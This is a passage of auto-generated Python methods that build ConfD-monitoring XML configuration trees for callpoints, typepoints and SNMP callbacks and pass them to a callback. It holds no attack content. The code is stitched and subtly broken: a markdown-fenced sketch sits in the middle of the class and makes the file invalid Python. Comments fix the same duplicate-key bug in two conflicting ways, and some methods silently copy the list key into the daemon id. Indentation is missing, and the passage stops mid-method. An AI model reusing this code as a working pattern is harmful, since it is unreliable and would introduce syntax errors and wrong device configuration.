def confd_state_internal_callpoints_snmp_inform_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_inform_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_inform_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_inform_callback = ET.SubElement(callpoints, "snmp-inform-callback")
id_key = ET.SubElement(snmp_inform_callback, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(snmp_inform_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id = ET.SubElement(snmp_notification_subscription, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = id_key.text  # reuse the value popped above; a second kwargs.pop('id') would raise KeyError
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = id_key.text  # reuse the value popped above; a second kwargs.pop('id') would raise KeyError
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(snmp_notification_subscription, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_snmp_notification_subscription_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
snmp_notification_subscription = ET.SubElement(callpoints, "snmp-notification-subscription")
id_key = ET.SubElement(snmp_notification_subscription, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(snmp_notification_subscription, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id = ET.SubElement(error_formatting_callback, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
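# A standalone sketch of the builder pattern every method in this class
# follows: construct the <config> ElementTree, then hand it to `callback`
# (normally self._callback, which sends it to the device). `demo_build` is
# hypothetical and exists only to illustrate the pattern; passing
# `callback=ET.tostring` simply serializes the tree instead of sending it.

```python
import xml.etree.ElementTree as ET

def demo_build(id_value, callback=ET.tostring):
    # Same element chain as confd_state_internal_callpoints_error_formatting_callback_id.
    config = ET.Element("config")
    confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
    internal = ET.SubElement(confd_state, "internal")
    callpoints = ET.SubElement(internal, "callpoints")
    efc = ET.SubElement(callpoints, "error-formatting-callback")
    ET.SubElement(efc, "id").text = id_value
    # The callback receives the root element, not a serialized string.
    return callback(config)
```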
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
# The 'id' list key was already popped above, so the nested daemon id must
# use a distinct kwarg; a second kwargs.pop('id') would raise KeyError.
id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")  # presence-only (empty) leaf; no text value to set
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
# The 'id' list key was already popped above, so the nested daemon id must
# use a distinct kwarg; a second kwargs.pop('id') would raise KeyError.
id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(error_formatting_callback, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_error_formatting_callback_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
error_formatting_callback = ET.SubElement(callpoints, "error-formatting-callback")
id_key = ET.SubElement(error_formatting_callback, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(error_formatting_callback, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id = ET.SubElement(typepoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
# The typepoint 'id' key was already popped above, so the nested daemon id
# must use a distinct kwarg; a second kwargs.pop('id') would raise KeyError.
id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")  # presence-only (empty) leaf; no text value to set
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
# The typepoint 'id' key was already popped above, so the nested daemon id
# must use a distinct kwarg; a second kwargs.pop('id') would raise KeyError.
id.text = kwargs.pop('daemon_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(typepoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_typepoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
typepoint = ET.SubElement(callpoints, "typepoint")
id_key = ET.SubElement(typepoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(typepoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_notification_stream_replay_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
